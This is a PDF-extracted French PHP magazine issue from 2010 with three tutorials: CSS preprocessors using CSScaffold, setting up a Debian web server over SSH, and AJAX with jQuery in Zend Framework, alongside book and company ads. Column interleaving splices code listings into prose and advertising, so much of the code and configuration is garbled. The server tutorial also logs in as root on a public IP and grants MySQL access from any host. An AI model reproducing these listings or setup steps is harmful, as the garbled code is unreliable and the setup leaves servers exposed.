ela fait dix ans que les CSS existent,
cependant nous en sommes prati-
quement au point de départ en ter-
me d’optimisation. D’un site à un autre on
préférera tout recommencer avec une copie
vierge, ou presque.
Dans le domaine de la programmation, on
utilise des méthodes pour capitaliser et amé-
liorer notre travail : MVC, KISS, ...
Pourquoi ne pas adapter ces méthodes aux
CSS ? Peut-être parce que CSS n’est pas un
langage de programmation ? Comment met-
tre en place du MVC avec du CSS ? C’est
pour cela que depuis quelques années des
projets de dynamisation de CSS émergent
un peu partout. On les appelle les prépro-
cesseurs CSS. Leur objectif est de produire
du CSS en utilisant des variables, des fonc-
Pour comprendre l’intérêt d’un préproces-
seur CSS, nous allons l’illustrer sur un cas
concret comme un site qui change d’ambian-
ce au fur et à mesure des saisons : noël, été,
soldes, … . Ce projet nous obligerait à avoir
deux feuilles de style : une pour la structure
des blocs (largeur, positionnement,... ) et une
autre pour les couleurs et les images du site.
Ce qui nous ferait répéter les sélecteurs CSS
deux fois.
Pour notre exemple, nous allons utiliser
CSScaffold. Il n’existe aucun standard pour
le moment dans l’écriture des CSS avec un
préprocesseur, chaque projet va dans sa pro-
pre direction. J’ai choisi celui là car il est dé-
veloppé en PHP, rapide à mettre en place, et
suffisamment mature pour être utilisé dans
un site en production.
En développement, dès qu’un traitement
nous parait répétitif, nous créons une fonc-
tion. Grâce au préprocesseur nous allons pou-
voir créer des fonctions CSS.
Prenons l’exemple d’une boîte flottante gé-
nérique. Comme c’est souvent le cas, on a be-
soin de lui définir une largeur, mais aussi, afin
de corriger le bug du doublement de marge
sur Internet Explorer 6 nous lui ajoutons un
display:inline. Le Listing 3 nous présente
une fonction qui prendra en compte tous nos
besoins.
Vous pouvez aussi réaliser des calculs pour
déterminer une taille de marge, mettre des
conditions if pour tester votre code et créer
des boucles pour optimiser vos fonctions.
Avec tout cela vous allez pouvoir créer
une véritable bibliothèque CSS suivant vos

Listing 1. En CSS normal Comment fonctionne un préprocesseur CSS

#main{
background: #587c90;
Chaque préprocesseur CSS a sa propre méthode. Pour CSScaffold, un fichier htaccess per-
color:#fff;
} met l’interprétation du CSS. La feuille CSS est reconstruite à chaque interrogation en déve-
#main a{ loppement, et un fichier de cache est utilisé en production. Si cette méthode ne vous plait
color:#fff;
}
pas vous serez peut-être intéressé par LESS. Il prend la forme d’un logiciel en ligne de com-
#main a:hover{ mande qui compilera vos fichiers .less en .css . Initialement développé en Ruby, il existe éga-
color:#dbbd8a; lement une version en PHP.
}

12 4/2010
 En librairie Préprocesseur CSS

Vous ne développerez
plus comme avant !
La « bible » française sur PHP
avec de nombreux retours
d’expérience et de cas pratiques.

Par Éric Daspet : impliqué depuis 1996

dans PHP, contributeur à Openweb.eu.org,
cofondateur des conférences Paris-Web et
Cyril Pierre de Geyer, cofondateur de l’AFUP,
contributeur à PHPteam.net et PHPfrance.

Recommandé par :

PHP 5 avancé - 5e édition

844 pages – 45 €

Et aussi

NOUVELLE ÉDITION
Objectif sécurité avec Allez plus loin avec
Damien Seguy (AFUP, PHP Guillaume Ponçon (AFUP,
Québec) et Philippe Gamache Web TV PHPTV).
(phportail.net). Un condensé d’expertise
pour tous les développeurs. N’oubliez pas
votre mémento !
Sécurité PHP 5 et MySQL
2e édition Best practices PHP 5
286 pages – 32 € 490 pages – 39 € La substantifique
mœlle de PHP
et SQL par Cyril
Pierre de Geyer et
Mieux développer en Guillaume Ponçon.
Les meilleures pratiques de PHP avec Symfony 1.2
développement web avec et Doctrine. Par Fabien
PHP 5 et le Zend Framework. Potencier (Sensio Labs) et Mémento PHP et SQL
14 pages – 5 €
Par Julien Pauli (AFUP, Anaska) Hugo Hamon (Apprendre-
et Guillaume Ponçon. PHP.com).

Zend Framework Symfony

446 pages – 39 € 504 pages – 39 €

www.editions-eyrolles.com/Theme/807065
Découvrez tous nos livres sur PHP et téléchargez gratuitement des extraits !
www.phpsolmag.org 13
 Projets

Qu’est-ce qu’un Listing 2. Et maintenant avec CSScaffold

framework CSS ? @constants{
bgColor: #587c90;
Un framework CSS est tout simplement textColor: #fff;
un fichier CSS regroupant des classes tou- hoverlinkColor: #dbbd8a;
tes prêtes. Il permet de mettre rapidement }

une structure de site en place. Par exemple #main{

avec 960.gs si vous mettez la classe grid-4 background:$bgColor;
sur une <div> vous aurez un bloc flottant color:$textColor;
de 300px de large. a{
color:$textColor;
&:hover{
color:$hoverlinkColor;
propres habitudes de développement. Pour }
que ce soit une véritable bibliothèque il faut }
}
un fichier réservé à ces fonctions, ainsi il sera
plus facile de le réutiliser d’un projet à un Listing 3. Une fonction pour boîte flottante
autre.
Nous allons procéder comme en PHP avec .monbloc1{
+floatleft(300);
les méthodes require et include. Le Lis- }
ting 4 nous montre un exemple d’applica- .monbloc2{
tion. +floatleft(500);
Le préprocesseur se chargera d’importer les }
=floatleft($width=100){
feuilles de style comme s’il y en avait qu’une
float: left;
seule. display: inline;
Ainsi vous pouvez séparer votre code CSS width: $width;
sans multiplier les requêtes HTTP sur votre }
serveur. Le préprocesseur s’occupe de tout.
Listing 4. Importation de feuilles CSS
Vous pouvez ainsi développer en équipe sur
des CSS de façon optimal. @include 'theme/hiver.css';
@include 'base/popup.css';
Mettre une grille de mise @include 'composant/menugauche.css';
@include 'composant/forum.css';
en forme
Certains l’auront remarqué, il existe déjà Listing 5. Exemple d’utilisation d’une grille
quelques méthodes provenant du monde de
l’impression qui nous permettent d’amélio- @grid
rer nos feuilles CSS. Elles sont connues sous {
grid-width:960;
le nom de framework CSS : 960.gs, Blueprint column-count:12;
ou encore YUI CSS. Ces frameworks per- right-gutter-width:10;
mettent de réaliser un site en se basant sur left-gutter-width:10;
une grille de mise en forme avec des colon- }
nes et des boîtes flottantes. Cela permet un
#menu{
meilleur confort de lecture et une structu- +columns(2);
re de page plus fluide. Vous pouvez voir sur }
Figure 1 un site utilisant un framework CSS
(960.gs) avec en transparence la grille de mise #contenu{
+columns(10);
en place. }
En pratique, on définit une <div> princi-
pal qui sert de conteneur. Elle a une largeur Listing 6. Le code généré par notre préprocesseur CSS
fixe et est centrée. Elle nous permet de diviser
#menu{
le site en plusieurs colonnes, chaque colonne width:140px;
a une taille définie par une classe. display:inline;
L’inconvénient des frameworks est qu’ils float:left;
imposent des classes avec des noms peu évo- margin-left:10px;
cateurs ( grid-3, push-2, yui-b, ... ) qui n’ont margin-right:10px;
}
aucun rapport avec le contenu. En bref on
mélange ainsi le fond et la forme dans le #contenu{
HTML. width:780px;
Avec un préprocesseur CSS, cet inconvé- display:inline;
float:left;
nient est corrigé. Il est possible d’aller beau- margin-left:10px;
coup plus loin qu’avec un système de grille margin-right:10px;
normal. On peut définir le nombre de colon- }
ne de notre grille ainsi que sa largeur.

14 4/2010
 Rejoignez
RejoignezleleClub
Club.PRO
.PRO Pour
Pourplus
plusdederenseignement
renseignement: [email protected]
: [email protected]

Stoneld Inworld
Stoneld Inworld propose aux entreprises des solutions globale d’intègration d’Internet et des Univers
Virtuels dans leur stratégie de développement. Au-delà de ses services, la société consacre 30% de
ses ressources à des travaux de R&D sur le e-Commerce et le e-Learning dans les Mondes Virtuels.

COGNIX Systems
Conseil, conception et développement d’applications évoluées pour les systèmes d’informations Internet/
intranet/extranet. Alliant les compétences d’une SSII et d’une Web Agency, Cognix Systems conçoit des
applicatifs et portails web à l’ergonomie travaillée et des sites Internet à forte valeur ajoutée.
http://www.cognix-systems.com
Figure 1. Exemple de site utilisant une grille de mise en place

Anaska Formation
Sur Internet Anaska est le spécialiste des formations sur les technologies OpenSource. En partenariat avec MySQL
AB, Mandriva, Zend et d'autres acteurs de la communauté, Anaska vous propose un catalogue de plus
• http://github.com/anthonyshort/csscaffold – Site du projet de 50 formations dédiés aux technologies du Libre.
CSScaffold, http://www.anaska.com
• http://wiki.framwurk.org/documents:csspp/ – Un préprocesseur
CSS en PHP,
• http://www.lesscss.org – Un autre préprocesseur en RUBY,
• http://github.com/leafo/lessphp – La version PHP du même pré-
WEB82
Création et hébergements de sites web pour particuliers, associations, entreprises, e-commerce.
processeur, Développement entierement aux normes W3C (www.w3.org) de sites web de qualité, au graphisme
• http://960.gs/ – Si vous souhaitez découvrir le framework soigné et employant les dernieres technologies du web (PHP5, MySQL5, Ajax, XHTML, CSS2).
960.gs, http://www.web82.net
• http://www.blueprintcss.org/ – Un autre système de grille,
• http://developer.yahoo.com/yui/grids/ – YUI CSS, actuellement
dans sa version 2. Core-Techs
Expert des solutions de gestion et de communication d’entreprise en Open Source, Core-Techs
conçoit, integre, déploie et maintient des systemes de Gestion de Contenu Web, de Gestion
Avec CSScaffold on définit en premier la taille du conteneur, en- Documentaire, de Gestion de la Relation Client (CRM), d’ecommerce et de travail ollaboratif.
http://www.core-techs.fr
suite le nombre de colonnes désirées et ensuite la taille des gouttières
de chaque colonne. Ces gouttières sont des marges qui nous permet-
tront de séparer chaque colonne de façon visible. Automatiquement POP FACTORY
le préprocesseur calculera la largeur que fera chaque colonne. PoP Factory,SSII spécialisée Web. Développement de solutions applicatives spéciques ; offre de
Faisons un exemple avec le Listing 5, nous voulons un conteneur solutions packagées : catalogue numérique, e-commerce, livre/magazine numérique, envoi SMS. Nous
de 960px ( rendu idéal pour un affichage en 1024px ) , et 12 colon- accompagnons nos clients tout au long de leur projet : audit, conseil, développement, suivi et gestion.
http://www.popfactory.com / [email protected]
nes avec des gouttières de 10px. Nous aurons des colonnes de 80px.
On voit ensuite dans le Listing 6 ce qui sera généré par CSScaffold.
Ce qui nous fait en largeur (140+10+10)+(780+10+10) = 960px.
En réalité cet exemple n’est pas pris au hasard. Il correspond exac-
Blue Note Systems
Spécialistes en CRM Open Source, nous proposons une offre complète de prestations sur la
tement aux paramètres de 960.gs. Ainsi ceux qui sont déjà habitués solution SugarCRM. Notre valeur ajoutée réside dans une expertise réactive et une expérience des
à un système de grille retrouveront facilement leurs marques. problématiques de la GRC. Nous vous aidons à tirer le meilleur parti de votre solution CRM.
http://www.bluenote-systems.com
Conclusion
Dans un cadre professionnel, on notera la puissance des préproces-
seurs CSS, mais attention aux feuilles qui seront générées : elles peu- Intelligence Power
Conseil, Expertises, Formations et Projets E-business centrés au tour du cśur de métier : la Business
vent se retrouver plus lourdes si on n’y prend pas garde. En effet, sans Intelligence. Intelligence Power vous propose des solutions innovantes pour aligner la technologie sur
regard directe avec la feuille CSS finale, on peut générer des codes la stratégie de votre entreprise.
conséquents. C’est une véritable solution pour intégrateur profes- http://www.intelligencepower.com
sionnel mais un piège pour un débutant.
Un jour on pourrait imaginer que le code utilisé pour le prépro-
cessing CSS soit directement interprété par le navigateur internet. Web Alliance
Vous souhaitez être en première page des moteurs de recherche ? Rejoignez-nous, 100% des clients
C’est peut-être ça le futur de CSS... Web Alliance sont en 1ère page de Google. Web Alliance, société de conseil spécialisée dans le
référencement internet, vous propose son expertise (référencement, liens sponsorisés, web-marketing).
www.web-alliance.fr

Club.PRO
Club .PRO
AURÉLIEN MASFRAND
L’auteur travaille depuis 3 ans en tant que développeur de site Internet. De
plus, il conçoit des sites accessibles suivant les recommandations actuelles.

www.phpsolmag.org 15
 Projets

Administrer
votre serveur Debian par SSH
Debian est une distribution Linux non commerciale
lancée en 1993 par Ian Murdock avec le soutien
de la Free Software Foundation, composée uniquement
de logiciels libres ; Debian est souvent utilisé grâce
à sa réputation de distribution extrêmement stable.
get install libapr1 apache2 apache2.2-common
Cet article explique : Ce qu’il faut savoir : apache2-utils libapache2-mod-chroot libapa-
• Dans cet article, vous allez apprendre com- • Avoir quelques connaissances sous Linux. che2-mod-php5 apache2-mpm-prefork libapa-
ment installer et configurer un serveur De- • Connaître le fonctionnement de PHP / SQL. che2-mod-auth-pam libapache2-mod-auth-sys-
bian avec Apache, PHP, MySQL, PHPMyAd- group. Si vous souhaitez par la suite utiliser
min, Webmin ainsi que Proftpd par SSH. perl ou python avec apache au lieu de php5, il
suffit d’installer les modes souhaités :

Installation et configuration apt-get install libapache2-mod-perl2 (optionnel),

d’Apache/PHP/MySQL
Niveau de difficulté Avant d’installer Apache/PHP/MySQL, as-
surez vous d’avoir mis un mot de passe assez
résistant pour l’utilisateur root. Pour le mo-
difier, utilisez la commande : passwd root.
apt-get install libapache2-mod-python (optionnel).
Après ceci, nous devons installer le module apa-
che pour supporter mysql. Il est aussi possible
d’utiliser oracle ou encore postgresql. apt-get ins-

D
ans cet article, nous utiliserons le
protocole SSH (Secure Shell) qui
est un protocole sécurisé utilisé
pour crypter les informations circulant sur
un réseau utilisant le protocole en ques-
tion. Toutes les images sont disponibles
à télécharger sur le site phpsolmag.org.
Connectez vous à votre serveur par SSH
qui est normalement juste installé grâce
à l’utilisateur SSHD ou openssh-server :
Et suivez les instructions. Vous devriez obte-
nir un résultat similaire à la Figure 1.
Mettez à jour votre serveur avant de pour-
suivre : apt-get update && apt-get upgrade.
Ensuite nous allons commencer par instal-
ler Apache avec le mod chroot pour éviter
que les utilisateurs du serveur puissent na-
viguer ailleurs que dans leur répertoire : apt-
tall libapache2-mod-auth-mysql. Notre serveur
Apache est maintenant opérationnel. Il suffit
de vérifier en allant en http sur notre serveur.
Voici ce que vous devriez avoir (voir Figure 2).
Maintenant, nous allons créer un utilisa-
teur avec la commande adduser pour redi-
riger la page par défaut d’Apache vers les pa-
ges de cet utilisateur. Pour ma part j’utiliserai

ssh root@adresseipdevotreserveur

Dans mon cas, cela donnera :

ssh [email protected] -p 22

root étant l’utilisateur ayant les droits les

plus élevés sur une machine linux.
Si vous avez mis le protocole SSH sur un
autre port que le port 22, veuillez modifier
le paramètre -p de la commande. Si SSH est
bien sur le port 22, le paramètre -p est facul-
tatif. Pour plus d’informations, lisez le ma-
nuel de la commande ssh en tapant : man
ssh dans votre terminal. Par sécurité, évitez
le plus possible d’installer trop de services
car chaque service est un risque potentiel
pour un serveur connecté sur la toile. Figure 1. Passwd

16 4/2010
 Debian

mon pseudonyme shock comme nom d’utili-

sateur adduser shock. Vous devriez obtenir un
résultat similaire à la Figure 3.
Pour vérifier que l’utilisateur a été créé, on
utilise la commande : cd /home/ && ls.
Si vous voyez un répertoire avec votre nom
d’utilisateur, l’utilisateur est opérationnel.
Il faudra ensuite créer un répertoire public_
html dans le répertoire utilisateur concerné
pour placer nos pages web par la suite.

mkdir /home/shock/public_html

shock étant à remplacer par votre nom d’uti-

lisateur. Installons maintenant php5 ainsi
que son extension pour mysql : apt-get install Figure 2. Apache2
php5 php5-mysql. Une fois les paquets pour
php5 installés, il faut installer le serveur mys-
ql et phpmyadmin, phpmyadmin n’étant pas
une obligation, je vous le conseille vivement.

apt-get install mysql-server

MySQL vous demandera un mot de passe

pour l’utilisateur root comme sur la Figure 4.
Une fois l’installation de MySQL finie, nous
allons installer phpmyadmin pour gérer faci-
lement nos bases de données.

apt-get install phpmyadmin

PHPMyAdmin vous demandera de s’auto-

configurer pour le serveur Apache utilisé.
Utilisez bien la touche ESPACE pour sélec-
tionner Apache2 avant d’appuyer sur entrée,
sans quoi, l’installation ne se fera pas automa-
tiquement (voir Figure 5).
Une fois PHPMyAdmin installé, nous pou-
vons vérifier son fonctionnement sur le ser-
veur :

http://188.165.41.250/phpmyadmin/ Figure 3. Adduser debian

188.165.41.250 étant l’adresse ip de mon

serveur, l’utilisateur étant root, le mot de pas-
se étant celui précisé pour MySQL. Ensuite
nous allons rediriger la page par défaut d’Apa-
che vers la page de l’utilisateur principal que
l’on a créé. Tout d’abord, nous devons créer
un index.html dans le public_html pour tes-
ter la redirection par la suite :

nano /home/shock/public_html/index.html

On écrit Test par exemple et on quitte avec

ctrl+x en enregistrant. Ensuite on édite le fi-
chier de configuration d’Apache pour chan-
ger le chemin du DocumentRoot.

nano /etc/apache2/sites-available/default

Et on change le DocumentRoot /var/www/ par

DocumentRoot /home/shock/public_html/ shock Figure 4. Installation de MySQL

www.phpsolmag.org 17
 Projets
étant toujours mon utilisateur. Il faut aussi
penser à modifier le chemin /var/www/ en des-
sous par notre chemin (voir Figure 6) et refai-
re la même opération pour default-ssl (https).
Ensuite nous allons sur notre serveur en
http et en https pour vérifier que la page in-
dex.html de l’utilisateur se charge bien à la
place de la page par défaut d’Apache. Si oui,
nous pouvons continuer, si non, vous devez
recommencer l’opération précédente. Pour
finir la configuration d’Apache, il faut activer
les répertoires /home/nomdelutilisateur/pu-
blic_html pour tous les utilisateurs ajoutés
par la suite : a2enmod userdir.
Pour ajouter un utilisateur, il suffit de faire
un adduser et de créer un répertoire public_
html dans son répertoire comme fait précé-
demment avec l’utilisateur shock. Le répertoire
de chaque utilisateur est maintenant accessible
par le net en tapant ceci dans la barre d’adres-
se : http://ipdevotreserveur/~nomdelutilisateur/.
Exemple pour ma part : http://188.165.41.250/
~shock/.
Installation et configuration
de Proftpd et de Webmin
Nous allons maintenant installer Proftpd.
Tout d’abord, nous installons le paquet.
apt-get install proftpd
Proftpd vous propose soit de s’installer en ser-
vice inetd (Threadé) soit indépendamment :
à vous de choisir en fonction de vos besoins.
La version threadée n’exécutera que le service
proftpd à la demande d’une connexion en ftp
sur le serveur avec une petite perte de temps
à chaque connexion mais diminuera les res-
sources prises par le serveur contrairement
à la version indépendante qui sera plus rapide
lors d’une connexion mais qui sera en perma-
nence lancée sur le serveur.
Figure 5. PHPMyAdmin
18
Nous devons par la suite éviter que les uti-
lisateurs du serveur puissent remonter les ré-
pertoires par mesure de sécurité, éditons pro-
ftpd.conf.
nano /etc/proftpd/proftpd.conf
Nous recherchons cetteligne : DenyFilter \*.*/
et nous ajoutons ces deux lignes en dessous de
celle ci :
DefaultRoot ~
DefaultChdir ~
Ainsi que le user et le group :
User www-data
Group www-data
www-data correspondant à l’utilisateur
d’Apache.
Nous enregistrons avec ctrl+x et nous relan-
çons le service proftpd : /etc/init.d/proftpd
restart. Vous pouvez désormais vous connec-
ter à votre serveur en ftp en utilisant le nom
d’utilisateur et le mot de passe voulu. Pour
moi, ça sera shock et mon mot de passe. Dès
qu’un utilisateur sera ajouté sur le serveur
avec la commande adduser, proftpd le pren-
dra en compte, apache aussi.
Nous avons donc un serveur opérationnel.
Il nous suffit maintenant d’installer Webmin
pour avoir une administration complète du
serveur par le web de façon sécurisée. apt-get
install perl libnet-ssleay-perl openssl libauthen-
pam-perl libpam-runtime libio-pty-perl libmd5-
perl && cd /home/ && wget http://prdownloads.
sourceforge.net/webadmin/webmin_1.510_all.
deb && dpkg --install webmin_1.510_all.deb
&& rm webmin_1.510_all.deb
Webmin est maintenant accessible sur le
port 10000 de votre serveur en https. Exem-
Sur Internet :
• http://www.debian.org/,
• http://doc.ubuntu-fr.org/ssh,
• http://doc.ubuntu-fr.org/proftpd,
• http://www.webmin.com/,
• http://guides.ovh.com/guides#link10.
ple : https://188.165.41.250:10000/. L’utili-
sateur est root, et le mot de passe est celui de
l’utilisateur root, vous devez maintenant voir
l’interface de webmin comme sur la Figure 7.
Votre serveur est maintenant totalement
opérationnel, il suffit maintenant de créer
une base de données pour chaque utilisateur
pour que celui puisse avoir un accès à php-
myadmin. Pour ajouter un utilisateur sur le
serveur, nous devons faire ceci (je prendrai
comme nom d’utilisateur, l’utilisateur gu-
tixlord :
adduser gutixlord && mkdir /home/gutixlord/
public_html/
Ensuite il faut se loguer en root sur phpmyad-
min donc : http://188.165.41.250/phpmyad-
min/ pour mon serveur.
Et exécuter une commande sql pour ajou-
ter un utilisateur, voici la commande en ques-
tion à modifier selon l’utilisateur :
CREATE USER ‘gutixlord’@’%’ IDENTIFIED
BY ‘lemotdepassevoulu’;
GRANT USAGE ON * . * TO ‘gutixlord’@’%’
IDENTIFIED BY ‘lemotdepassevoulu’ ;
CREATE DATABASE IF NOT EXISTS `gu-
tixlord` ;
GRANT ALL PRIVILEGES ON `gutixlord` .
* TO ‘gutixlord’@’%’;
Vous devriez avoir un résultat ressemblant à
la Figure 8.
Les étoiles étant remplacées par le mot de
passe voulu. Il existe aussi une méthode plus
simple pour certaines personnes en utilisant
l’interface de PHPMyAdmin en faisant une
insertion dans la table user de la base de don-
nées mysql. Pour conclure, vous avez main-
tenant un serveur opérationnel, d’autres
configurations sont réalisables ainsi que
l’automatisation de la création d’un utilisa-
teur sur le serveur.
FAURE YANN
Faure Yann est un développeur passionné de sé-
curité informatique depuis plusieurs années, pro-
grammant dans plusieurs langages, il aimerait
poursuivre ses études dans la programmation
ou dans la sécurité informatique. Si vous souhai-
tez me contacter, vous pouvez m’envoyer un mail
à cette adresse : [email protected].
4/2010
 Debian

www.phpsolmag.org 19
 Dossier

AJAX facile
avec JQuery et Zend Framework
jQuery est une bibliothèque Javascript. Intégrée
à Zend Framework, elle permet de développer rapidement
des interfaces riches et dynamique. Cet article utilise
le lien AJAX proposé par ZendX_JQuery, utilisé à travers
le modèle MVC du framework.
Création de la page Album
Cet article explique : Ce qu’il faut savoir : Photo
• Comment faire des liens AJAX rapidement • PHP 5 orienté objet. Dans un premier temps, développons une
avec ZendX_JQuery. • Les bases de Zend Framework, en particu- page web minimale utilisant les composants
• Comment rendre votre interface web plus lier l'implémentation MVC. Zend_Controller et Zend_View. Si vous dis-
dynamique et attrayante. posez déjà d’une implémentation MVC basée
• Comment mettre en place une base solide sur ces composants, vous pouvez bien enten-
pour développer encore plus vite en AJAX. du l’utiliser.
Commençons par télécharger les sources
de Zend Framework que vous trouverez sur
mework. Attention : si vous téléchargez les le site officiel :
sources minimales, les composants alterna- http://framework.zend.com. Une fois le pa-
Niveau de difficulté tifs préfixés par ZendX risquent de ne pas quetage téléchargé et déployé, nous pou-
être fournis. Vous ne pourrez donc pas utili- vons utiliser Zend_Tool pour générer une
ser les classes jQuery utiles à la mise en place architecture minimale, avec la commande
de l’application exemple. suivante :

L
e principal intérêt des interfaces ri- D’autre part, rappelons qu’une bonne
ches (RIA, AJAX) pour une applica- connaissance du modèle MVC de Zend Fra- /web/bin/zf.sh create project /web/myapp
tion web est de pouvoir naviguer en mework est conseillée, sinon requise, pour
mettant à jour uniquement les données chan- apprécier la rapidité de mise en oeuvre du Remplacez /web/bin par le chemin vers le
geantes. A l’opposé, une application classique composant jQuery ainsi que sa facilité d’uti- binaire zf.sh (linux, mac) ou zf.bat (win-
recharge une page complète à chaque fois que lisation. dows) et /web/myapp par l’emplacement dans
l’on clique sur un lien. Le lien hypertexte clas-
sique est remplacé par un lien javascript qui
s’occupe d’aller chercher l’information et de
l’afficher au bon endroit dans la page, sans re-
charger celle-ci. Il en découle un gain en rapi-
dité, une économie de bande passante et une
impression de fluidité.
Dans cet article, nous allons mettre en pla-
ce un album de photos utilisant AJAX. Nous Figure 1. Installation rapide d’une architecture Zend Framework opérationnelle
souhaitons qu’en cliquant sur le lien d’une
photo, cette dernière soit mise à jour sans re-
charger la page. Ce système permet de rendre
l’affichage des photos plus rapide (car il y a
moins de données à charger) et plus fluide
(car la page n’est pas rechargée).

Prérequis
Pour que le code source l'article fonctionne,
vous avez besoin de PHP 5.1.x ou plus (PHP
5.2.x conseillé) installé sur un serveur HTTP,
ainsi que les sources complètes de Zend Fra- Figure 2. Page d’accueil vide du contrôleur photo

20 4/2010

lequel vous souhaitez mettre les sources de
votre nouveau projet.
Initialisation de jQuery
Pour utiliser les aides de vue spécifiques à jQue-
ry dans Zend Framework, il est nécessaire d’ef-
fectuer une petite déclaration dans le bootstrap
de l’application. Le fichier /web/myapp/applica-
tion/Bootstrap.php doit contenir le code source
illustré sur le Listing 1. Dans ces quelques li-
gnes, après l’avoir initialisée nous attachons à la
vue par défaut le chemin vers les aides de vue
jQuery, puis nous activons jQuery.
Un peu de théorie
Pour faire une interface riche et permettre la
mise à jour de données avec AJAX, il est néces-
saire de diviser le contenu de la page web en
blocs. Cette opération est généralement effec-
tuée avec des balises html <div>, qui délimi-
tent ces blocs. Ainsi, les informations situées
dans ces conteneurs pourront être mises à jour
dynamiquement, sans recharger la page.
Un lien AJAX fait appel à une une fonction
Javascript. C’est jQuery qui va s’occuper d’en-
voyer la requête HTTP au serveur et non direc-
tement le navigateur, comme c’est le cas pour
les liens classiques. C’est également jQuery
qui réceptionnera les données afin de mettre
à jour le bloc correspondant à la requête.
La Figure 3 illustre les transactions effec-
tuées entre un utilisateur (client) et le serveur
(apache, php). Dans un premier temps, la pa-
ge complète est chargée, puis dès la deuxième
requête (quand l’utilisateur clique sur un lien
pour afficher une photo), seules les données
qui doivent changer sont mises à jour, par l’in-
termédiaire de jQuery.
De la théorie à la pratique
Notre album photo va proposer autant de liens
qu’il y a de photos dans le répertoire public/pho-
tos. Commençons donc par créer ce répertoire
et ajoutons quelques images jpeg. Par mesure
de sécurité, nous allons imposer les caractères
Désactiver le lien meta vers
googleapis
Par défaut, l’implémentation jQuery de
Zend Framework fait appel à une biblio-
thèque hébergée par le site ajax.googlea-
pis.com. Cela permet à de nombreuses ap-
plications différentes d’utiliser le même fi-
chier, donc de diminuer la fréquence de
chargement du dit fichier. En revanche, ce
système nécessite une connexion perma-
nente à Internet pour fonctionner.
Pour désactiver l’utilisation de googlea-
pis, nous devons télécharger les sourc-
es de jQuery et de les installer à proxim-
ité de l’application, par exemple dans un
dossier public/scripts. Puis décommenter
les lignes correspondantes, mentionnées
dans le Listing 1.
www.phpsolmag.org
AJAX avec JQuery et Zend Framework
En savoir plus sur Zend Framework
Bien que nous expliquons rapidement comment créer une application minimale avec Zend
Framework, cet article n’a pas vocation à décrire cet outil. Vous en saurez davantage avec la
documentation en ligne et l’ouvrage Zend Framework, bien programmer en PHP aux éditions
Eyrolles.
Une fois le projet créé, nous allons également générer le contrôleur de l’album photo. Pour
gagner du temps, il est possible de le faire avec Zend _ Tool :
cd /web/myapp
/web/bin/zf.sh create controller photo
Par défaut, la création du contrôleur génère une action et une vue index qui vont gérer la
page dans laquelle va s’afficher l’album. A ce stade, vérifions que l’installation Zend Fra-
mework fonctionne en affichant la page encore vierge correspondant au contrôleur photo
(Figure 2).
Listing 1. Bootstrap minimal de l’application (Bootstrap.php)
class Bootstrap extends Zend _ Application _ Bootstrap _ Bootstrap
{
protected function _ initView()
{
// Création et paramétrage de la vue
$view = new Zend _ View();
$view->setEncoding('utf-8');
$view->headMeta()->setHttpEquiv('Content-type',
'text/html; charset=utf-8');
// Activation de jQuery
$view->addHelperPath('ZendX/JQuery/View/Helper/',
'ZendX _ JQuery _ View _ Helper');
$jquery = $view->jQuery();
$jquery->enable();
// Si vous ne souhaitez pas utiliser google
// on peut demander ŕ ZendX _ JQuery de travailler
// avec une bibliothčque locale
//$rmode = ZendX _ JQuery::RENDER _ JQUERY _ ON _ LOAD
// | ZendX _ JQuery::RENDER _ SOURCES;
//$jquery->setRenderMode($rmode);
//$jquery->addJavascriptFile('../scripts/jquery-1.3.2.min.js');
// Enregistrement de l’objet $view comme vue principale
$viewRenderer = new Zend _ Controller _ Action _ Helper _
ViewRenderer();
$viewRenderer->setView($view);
Zend _ Controller _ Action _ HelperBroker::addHelper($viewRenderer);
return $view;
}
}
Listing 2. Action PhotoController::indexAction() dans le fichier PhotoController.php
...
public function indexAction()
{
$photoPattern = $this-> _ getPhotoPath() . '/*.jpg';
$fi les = glob($photoPattern);
$photos = array();
foreach ($fi les as $path) {
$fi le = basename($path, '.jpg');
$photos[$fi le] = strtr($fi le, ' _ ', ' ');
}
$this->view->photos = $photos;
}
protected function _ getPhotoPath()
{
return realpath(APPLICATION _ PATH . '/../public/photos');
}
...
21
 Dossier
Particularité de Zend Layout
Dans l’exemple de l’article, nous nous contentons d’une implémentation minimale qui n’utilise
pas Zend_Layout. En revanche, il est parfaitement possible de gérer jQuery avec ce composant.
Il est en particulier judicieux d’intégrer jQuery au layout, entre les balises <head> et </head>, en
ajoutant cette ligne :
<?php echo $this->jQuery(); ?>
Tel que mentionné dans la section La vue index.phtml, cette ligne doit normalement être pla-
cée à la fin du template de vue afin d’être opérationnelle. Mais dans ce cas, le layout est calculé
après l’ensemble des vues, donc son emplacement dans le header du fichier HTML est possible.
Figure 3. Scénario classique d’une application AJAX
Figure 4. Aperçu de l’application
à utiliser pour le nom des fichiers. Ce sujet est
abordé un peu plus loin dans cet article.
A présent, nous devons travailler dans le
contrôleur PhotoController et dans les vues.
Le contrôleur va contenir deux actions :
• L'action index va afficher la page de l’al-
bum photo.
22
• L'action ajaxload va servir à charger une
photo. Cette action sera déclanchée par
les liens jQuery.
Comme nous avons deux actions, nous aurons
deux vues correspondantes. Détaillons main-
tenant ce que nous aurons dans chacun de ces
composants.
L’action PhotoController::
indexAction()
Cette action va afficher la page de l’album,
qui contient un titre, des liens pour chaque
photo et un bloc destiné à l’affichage des pho-
tos. Les seules données à traiter sont la liste
des images.
Le Listing 2 propose une implémentation de
cette action. Nous utilisons la fonction glob()
pour récupérer la liste des fichiers puis créons
un tableau $photos avec des données arran-
gées pour simplifier les traitements de la vue.
C’est cette variable qui est passée à la vue pour
afficher les liens vers les photos disponibles.
La vue index.phtml
Cette vue va contenir le code HTML d’une
page complète, à commencer par la ba-
lise <html>. Dans la section <head>, nous
pouvons mettre un titre et les aides de vue
permettant de générer les données préa-
lablement chargées dans la vue courante
($this->headMeta()).
Dans la section <body>, on peut mettre un
titre, puis un premier bloc <div> contenant
la liste des liens destinés à accéder aux pho-
tos. C’est ici que pour chaque image nous uti-
